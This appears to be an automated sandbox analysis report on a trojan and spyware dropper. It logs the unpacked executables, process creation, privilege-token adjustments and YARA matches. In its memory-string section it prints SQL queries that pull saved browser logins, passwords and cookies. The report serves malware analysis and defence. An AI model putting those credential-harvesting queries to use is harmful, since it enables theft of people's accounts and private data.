Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEF9FF615_2_6FEF9FF6
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEECE4015_2_6FEECE40
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEEAE3E15_2_6FEEAE3E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEFBC5D15_2_6FEFBC5D
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEFFC0115_2_6FEFFC01
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEFBB3D15_2_6FEFBB3D
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEE77A015_2_6FEE77A0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEE756E15_2_6FEE756E
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEE733C15_2_6FEE733C
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0005852517_2_00058525
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_000665B617_2_000665B6
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0006702F17_2_0006702F
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0005404E17_2_0005404E
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0007014617_2_00070146
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0005E1E017_2_0005E1E0
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0005326D17_2_0005326D
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0007055E17_2_0007055E
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0007457A17_2_0007457A
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0006373117_2_00063731
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_000747A917_2_000747A9
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_000527D417_2_000527D4
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0005E7E017_2_0005E7E0
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0005F8A817_2_0005F8A8
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0007099317_2_00070993
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_000639AC17_2_000639AC
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_000669EB17_2_000669EB
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0007CA2017_2_0007CA20
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_00065BE717_2_00065BE7
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0006FC4A17_2_0006FC4A
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0005EC5417_2_0005EC54
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_00063CDD17_2_00063CDD
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0005BD5317_2_0005BD53
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0005DDAC17_2_0005DDAC
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_00070DC817_2_00070DC8
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_0007CECE17_2_0007CECE
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_00055F0C17_2_00055F0C
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: 17_2_00080FD417_2_00080FD4
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0041203819_2_00412038
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0042716119_2_00427161
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_004212BE19_2_004212BE
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0044339019_2_00443390
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0044339119_2_00443391
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0041A46B19_2_0041A46B
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0041240C19_2_0041240C
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0044656619_2_00446566
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0041D75019_2_0041D750
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_004037E019_2_004037E0
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0042785919_2_00427859
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0041281819_2_00412818
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0040F89019_2_0040F890
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0042397B19_2_0042397B
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00409A4019_2_00409A40
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00411B6319_2_00411B63
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0047CBF019_2_0047CBF0
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00412C3819_2_00412C38
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00423EBF19_2_00423EBF
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00424F7019_2_00424F70
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0041AF0D19_2_0041AF0D
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1000C06319_2_1000C063
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_100060F019_2_100060F0
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_100071F019_2_100071F0
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1000925719_2_10009257
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1000834019_2_10008340
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1000E38019_2_1000E380
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1000B3B019_2_1000B3B0
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_100083F019_2_100083F0
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1000C48319_2_1000C483
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1001059019_2_10010590
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1000B88319_2_1000B883
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_100169BD19_2_100169BD
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_100099E019_2_100099E0
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_10010AED19_2_10010AED
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1000ABA019_2_1000ABA0
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1001EBD019_2_1001EBD0
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1000BC5719_2_1000BC57
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1001EDDB19_2_1001EDDB
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_1000FF7119_2_1000FF71
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: String function: 6FEA7EA0 appears 41 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: String function: 004062CF appears 58 times
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: String function: 00445975 appears 65 times
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: String function: 0041171A appears 38 times
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: String function: 10010534 appears 35 times
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: String function: 0041718C appears 41 times
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: String function: 00ED304E appears 35 times
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: String function: 00ED3370 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: String function: 01285B7A appears 128 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: String function: 01285BE3 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: String function: 10082D21 appears 63 times
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: String function: 01283AB0 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: String function: 0006E0E4 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: String function: 0006EB60 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCode function: String function: 0006E1C0 appears 52 times
Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 724
Source: KeJ7Cl7flZ.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: KeJ7Cl7flZ.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 002.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 002.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 002.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Setup.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jg2_2qua.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jg2_2qua.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jg2_2qua.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: aliens.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: aliens.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: aliens.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: aliens.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: aliens.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: aliens.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: aliens.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: aliens.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: aliens.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 85F91A36E275562F.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 85F91A36E275562F.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 85F91A36E275562F.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 85F91A36E275562F.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 85F91A36E275562F.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 85F91A36E275562F.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 85F91A36E275562F.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 85F91A36E275562F.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 85F91A36E275562F.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jg2_2qua.exe.26.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jg2_2qua.exe.26.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jg2_2qua.exe.26.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: KeJ7Cl7flZ.exe, 00000000.00000002.529860424.00000000074F0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs KeJ7Cl7flZ.exe
Source: KeJ7Cl7flZ.exe, 00000000.00000002.530016603.00000000075F0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs KeJ7Cl7flZ.exe
Source: KeJ7Cl7flZ.exe, 00000000.00000002.530016603.00000000075F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs KeJ7Cl7flZ.exe
Source: KeJ7Cl7flZ.exe, 00000000.00000002.511285265.00000000052F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs KeJ7Cl7flZ.exe
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeSection loaded: dxgidebug.dllJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: phoneinfo.dllJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dllJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dllJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: phoneinfo.dllJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dllJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeSection loaded: dxgidebug.dllJump to behavior
Source: 00000013.00000002.511085870.0000000003310000.00000040.00000001.sdmp, type: MEMORYMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 19.2.aliens.exe.3310000.5.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 19.2.aliens.exe.10000000.6.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 19.2.aliens.exe.3310000.5.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: jg2_2qua.exe.0.drStatic PE information: Section: .MPRESS1 ZLIB complexity 1.00011398709
Source: jg2_2qua.exe.26.drStatic PE information: Section: .MPRESS1 ZLIB complexity 1.00011398709
Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winEXE@13/35@12/2
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00EC1892 GetLastError,FormatMessageW,0_2_00EC1892
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_6FEA1870 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,15_2_6FEA1870
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,19_2_00464422
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,19_2_004364AA
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeCode function: 15_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,15_2_004044D1
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeCode function: 19_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,19_2_0043701F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeCode function: 1_2_01270B52 CoInitialize,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LdrInitializeThunk,CoCreateInstance,1_2_01270B52
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCode function: 0_2_00ECF19A FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00ECF19A
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeFile created: C:\Program Files (x86)\ujvqkl7ofji6Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\USERDA~1\Default\Login Data.bakJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeMutant created: \Sessions\1\BaseNamedObjects\37238328-1324242-5456786-8fdff0-67547552436675
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3568
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0Jump to behavior
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCommand line argument: sfxname0_2_00ED273E
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCommand line argument: sfxstime0_2_00ED273E
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCommand line argument: STARTDLG0_2_00ED273E
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCommand line argument: 9,0_2_00ED273E
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCommand line argument: 9,0_2_00ED273E
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeCommand line argument: h0_2_00EE6840
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCommand line argument: q17_2_0006D42A
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCommand line argument: sfxname17_2_0006D42A
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCommand line argument: sfxstime17_2_0006D42A
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeCommand line argument: STARTDLG17_2_0006D42A
Source: KeJ7Cl7flZ.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeSystem information queried: HandleInformationJump to behavior
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeFile read: C:\Windows\win.iniJump to behavior
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp, jg2_2qua.exe, 0000001A.00000002.503990767.0000000000401000.00000040.00020000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmpBinary or memory string: SELECT signon_realm, username_value, hex(password_value) FROM logins;
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp, jg2_2qua.exe, 0000001A.00000002.503990767.0000000000401000.00000040.00020000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmpBinary or memory string: SELECT * FROM moz_cookies;
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp, jg2_2qua.exe, 0000001A.00000002.503990767.0000000000401000.00000040.00020000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmpBinary or memory string: SELECT host_key,name, value, hex(encrypted_value) FROM cookies;
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp, jg2_2qua.exe, 0000001A.00000002.503990767.0000000000401000.00000040.00020000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 002.exe, 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: KeJ7Cl7flZ.exeVirustotal: Detection: 67%
Source: KeJ7Cl7flZ.exeReversingLabs: Detection: 79%
Source: hjjgaa.exeString found in binary or memory: 3http://crl.usertrust.com/AddTrustExternalCARoot.crl05
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeFile read: C:\Users\user\Desktop\KeJ7Cl7flZ.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\KeJ7Cl7flZ.exe 'C:\Users\user\Desktop\KeJ7Cl7flZ.exe'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 724
Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 740
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe' -s
Source: unknownProcess created: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe 'C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe'
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe' Jump to behavior
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe' Jump to behavior
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe 'C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exeProcess created: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe' -sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exeProcess created: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe 'C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe' Jump to behavior
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exeFile written: C:\Users\user\AppData\Local\Temp\RarSFX0\config.iniJump to behavior
